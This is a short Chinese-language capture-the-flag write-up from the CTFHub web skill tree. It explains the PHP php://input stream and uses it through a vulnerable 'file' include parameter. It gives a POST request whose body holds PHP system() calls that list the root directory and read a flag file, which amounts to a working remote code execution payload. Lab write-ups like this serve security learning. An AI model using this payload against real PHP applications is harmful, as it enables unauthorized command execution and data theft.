CTFHub Web技能树-php:input

CTFHub Web技能树-php:input

一.知识简介

 

php://            访问各个输入/输出流（I/O streams）

 

php://input    是个可以访问请求的原始数据的只读流。可以接收post请求作为输入流的输入，将请求作为PHP代码的输入传递给目标变量，以达到以post 的形式进行输入的目的。

二、启动环境

点击查看phpinfo链接

 

 

 

查看phpinfo，发现以下字段，证明是可以使用php://input的。

 

 

打开burp

修改方式为POST

POST /?file=php://input HTTP/1.1
<?php system ("ls  /")?>

 

 

<?php system("cat /flag_22324")?>